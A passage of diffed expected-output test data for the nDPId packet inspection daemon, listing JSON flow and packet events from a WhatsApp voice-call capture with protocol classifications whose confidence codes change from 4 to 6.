00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":640,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1561455738163,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1561455738163,"pkt":"2DBiVgAckLkxKPrKCABFAAAok2wAAP8GGLzAqAIMqf6i9MDIwAcC6LXACBPPY1AQCAWHOAAA"} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":641,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1561455738163,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1561455738163,"pkt":"kLkxKPrKxiwDYGpkCABFAAA0AAAAAP8GrByp\/qL0wKgCDMAHwMgIE89jAui1wYAQEABYwQAAAQEIChqjwVI0zNyh"} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":713,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455741430,"flow_last_seen":1561455741430,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455741430,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":50191,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00628{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":713,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1561455741430,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1561455741430,"pkt":"AQBef\/\/6kLkxKPrKCABFAAClZnoAAAIRnx\/AqAIM7\/\/\/+sQPB2wAke7DTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":713,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455741430,"flow_last_seen":1561455741430,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455741430,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":50191,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":713,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455741430,"flow_last_seen":1561455741430,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455741430,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":50191,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":714,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455741432,"flow_last_seen":1561455741432,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455741432,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":57546,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00627{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":714,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1561455741432,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1561455741432,"pkt":"AQBef\/\/6kLkxKPrKCABFAAClgs4AAAIRgsvAqAIM7\/\/\/+uDKB2wAkdIITS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":714,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455741432,"flow_last_seen":1561455741432,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455741432,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":57546,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
+00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":714,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455741432,"flow_last_seen":1561455741432,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455741432,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":57546,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00550{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":716,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455741484,"flow_last_seen":1561455741484,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1561455741484,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"91.252.56.51","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":716,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1561455741484,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1561455741484,"pkt":"xiwDYGpkkLkxKPrKCABFAAA4hv4AAEABnOPAqAIMW\/w4MwMDoFgAAAAARQAA73IeAAAxEb\/8W\/w4M8CoAgx\/wNwIANsAAA=="} 
-00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":716,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455741484,"flow_last_seen":1561455741484,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1561455741484,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"91.252.56.51","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.962659} +00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":716,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455741484,"flow_last_seen":1561455741484,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1561455741484,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"91.252.56.51","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":3.962659} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":726,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1561455742405,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1561455742405,"pkt":"xiwDYGpkkLkxKPrKCABFAAA4TCgAAEAB17nAqAIMW\/w4MwMDoOEAAAAARQAAZumbAAAxEUkIW\/w4M8CoAgx\/wNwIAFIAAA=="} 
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":727,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1561455742405,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1561455742405,"pkt":"xiwDYGpkkLkxKPrKCABFAAA4HrIAAEABBTDAqAIMW\/w4MwMDoOEAAAAARQAAZp1RAAAxEZVSW\/w4M8CoAgx\/wNwIAFIAAA=="} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1561455688201,"flow_last_seen":1561455742310,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6423,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"17.242.60.84","src_port":49354,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1561455688201,"flow_last_seen":1561455742310,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6423,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"17.242.60.84","src_port":49354,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} 
00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455738163,"flow_last_seen":1561455738163,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"169.254.162.244","src_port":49352,"dst_port":49159,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1561455738163,"flow_last_seen":1561455738163,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"169.254.162.244","src_port":49352,"dst_port":49159,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":85,"flow_first_seen":1561455707474,"flow_last_seen":1561455707887,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":41946,"flow_avg_l4_payload_len":493,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.52","src_port":50504,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WhatsApp","breed":"Acceptable","category":"Chat"}} 
-00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1561455721320,"flow_last_seen":1561455738622,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":1500,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":164,"flow_first_seen":1561455730495,"flow_last_seen":1561455742404,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":25046,"flow_avg_l4_payload_len":152,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"91.252.56.51","dst_ip":"192.168.2.12","src_port":32704,"dst_port":56328,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1561455741432,"flow_last_seen":1561455741432,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":57546,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455689728,"flow_last_seen":1561455689761,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":55296,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsAppFiles","breed":"Acceptable","category":"Download"}} +00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":85,"flow_first_seen":1561455707474,"flow_last_seen":1561455707887,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":41946,"flow_avg_l4_payload_len":493,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.52","src_port":50504,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"TLS.WhatsApp","breed":"Acceptable","category":"Chat"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1561455721320,"flow_last_seen":1561455738622,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":1500,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":164,"flow_first_seen":1561455730495,"flow_last_seen":1561455742404,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":25046,"flow_avg_l4_payload_len":152,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"91.252.56.51","dst_ip":"192.168.2.12","src_port":32704,"dst_port":56328,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1561455741432,"flow_last_seen":1561455741432,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"239.255.255.250","src_port":57546,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455689728,"flow_last_seen":1561455689761,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":55296,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WhatsAppFiles","breed":"Acceptable","category":"Download"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1561455705874,"flow_last_seen":1561455737895,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip6","src_ip":"fe80::414:409d:8afd:9f05","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455701309,"flow_last_seen":1561455731356,"flow_idle_time":200000,"flow_min_l4_payload_len":339,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":1360,"flow_avg_l4_payload_len":340,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455687942,"flow_last_seen":1561455687944,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":51431,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1561455702980,"flow_last_seen":1561455703262,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":7,"midstream":1,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"17.171.47.85","dst_ip":"192.168.2.12","src_port":443,"dst_port":50502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1561455704556,"flow_last_seen":1561455704556,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"169.254.162.244","dst_ip":"239.255.255.250","src_port":50384,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1561455706914,"flow_last_seen":1561455741420,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.196.62","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1561455706913,"flow_last_seen":1561455741419,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.193.48","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1561455701309,"flow_last_seen":1561455731356,"flow_idle_time":200000,"flow_min_l4_payload_len":339,"flow_max_l4_payload_len":341,"flow_tot_l4_payload_len":1360,"flow_avg_l4_payload_len":340,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1561455687942,"flow_last_seen":1561455687944,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"192.168.2.1","src_port":51431,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} 
+00671{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1561455702980,"flow_last_seen":1561455703262,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":7,"midstream":1,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"17.171.47.85","dst_ip":"192.168.2.12","src_port":443,"dst_port":50502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1561455704556,"flow_last_seen":1561455704556,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"169.254.162.244","dst_ip":"239.255.255.250","src_port":50384,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":736,"source":"wa_voice.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1561455706914,"flow_last_seen":1561455741420,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1561455743434,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.196.62","src_port":56328,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
